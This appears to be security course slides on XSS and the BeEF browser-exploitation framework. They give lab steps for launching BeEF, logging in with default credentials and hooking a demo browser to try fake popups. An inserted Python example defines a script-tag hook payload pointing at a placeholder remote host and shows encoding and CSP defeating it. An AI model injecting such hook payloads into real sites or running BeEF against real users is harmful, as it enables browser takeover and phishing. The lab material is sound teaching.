
Expose Website Security Vulnerabilities
XSS – EXPLOITING THE BROWSER
Browser Exploitation Framework (BeEF)

- Remember XSS? alert('hi') seemed pretty tame.
- What else can we do?
- Glad you asked!
- In Kali, start BeEF (Browser Exploitation Framework).
- In Kali, open Firefox and open http://localhost:3000/ui/panel. This is your administration panel.
- In any browser, visit http://<ip>:3000/demos/basic.html
- 'Hooking' a user = taking control of their browser.
- XSS doesn't look so innocuous now, does it?
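The slide's point is that the same injection point that runs alert('hi') can pull in a script from a server the attacker controls, which is what "hooking" rests on. The example below is added here and is not from the slides or from BeEF: it shows a constructed reflected-XSS sink beside its output-encoded version, a check that lists foreign script origins a page would load, and a minimal Content-Security-Policy evaluation showing why script-src 'self' stops a remote script. The site origin https://example.test, the TEST-NET origin http://203.0.113.5:3000 and the file name remote.js are placeholders, not values from the page.

```python
"""Why the XSS sink behind 'hooking' matters, and two controls that break it.

Added example, not from the slides and not BeEF code. The page template,
the site origin https://example.test, the TEST-NET origin
http://203.0.113.5:3000 and the script name remote.js are constructed
placeholders for illustration.
"""
import html
import re
from typing import Dict, List
from urllib.parse import urlparse

SITE_ORIGIN = "https://example.test"  # assumed origin of the vulnerable site

# Constructed payload: a tampered query parameter that loads a script from a
# foreign origin instead of plain text.
HOOK_PAYLOAD = "<script src='http://203.0.113.5:3000/remote.js'></script>"


def render_unsafe(name: str) -> str:
    """Reflected-XSS sink: untrusted text is spliced straight into markup."""
    return f"<html><body><h1>Hello {name}</h1></body></html>"


def render_safe(name: str) -> str:
    """Hardened: HTML-encode untrusted text so the browser treats it as text."""
    return f"<html><body><h1>Hello {html.escape(name, quote=True)}</h1></body></html>"


SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)


def external_script_origins(page: str, own_origin: str = SITE_ORIGIN) -> List[str]:
    """Origins of <script src=...> tags in the page that are not own_origin.

    A non-empty list on a page that should only load its own scripts is the
    tell-tale of a remote script being pulled in."""
    found: List[str] = []
    for src in SCRIPT_SRC_RE.findall(page):
        parts = urlparse(src)
        if parts.scheme and parts.netloc:
            origin = f"{parts.scheme}://{parts.netloc}"
            if origin != own_origin and origin not in found:
                found.append(origin)
    return found


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a Content-Security-Policy header into directive -> source list."""
    directives: Dict[str, List[str]] = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def csp_allows_script(header: str, script_origin: str, own_origin: str = SITE_ORIGIN) -> bool:
    """Minimal script-src check: 'self', '*', and exact origin matches only.

    Real CSP matching has more rules (schemes, host wildcards, nonces, hashes);
    this subset is enough to show why script-src 'self' blocks a foreign script.
    No header at all means no restriction, so the load is allowed."""
    directives = parse_csp(header)
    sources = directives.get("script-src", directives.get("default-src", ["*"]))
    for source in sources:
        if source == "*":
            return True
        if source == "'self'" and script_origin == own_origin:
            return True
        if source.lower() == script_origin.lower():
            return True
    return False


if __name__ == "__main__":
    print("unsafe page loads from:", external_script_origins(render_unsafe(HOOK_PAYLOAD)))
    print("safe page loads from:  ", external_script_origins(render_safe(HOOK_PAYLOAD)))
    policy = "default-src 'self'; script-src 'self'"
    print("CSP allows remote script?", csp_allows_script(policy, "http://203.0.113.5:3000"))
```

Output encoding removes the injection point itself; the CSP check is the second layer, for the case where an encoding bug slips through and the browser is asked to fetch a script from somewhere the site never intended.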
BeEF Lab

- In Kali, start BeEF (attacker):
  $ sudo beef-xss
- Visit the launched server: http://127.0.0.1:3000/ui/authentication
- Login: beef/beef
- In Kali, browse to the website (victim): http://127.0.0.1:3000/demos/basic.html
- Explore: what can you do to the hooked browser? Play a sound? (Turn volume on.) Fake popup? (LastPass?) Anything interesting in Social Engineering?
BeEF Lab

- In Kali, start BeEF (attacker).
- If you cannot log in to BeEF, try these steps.
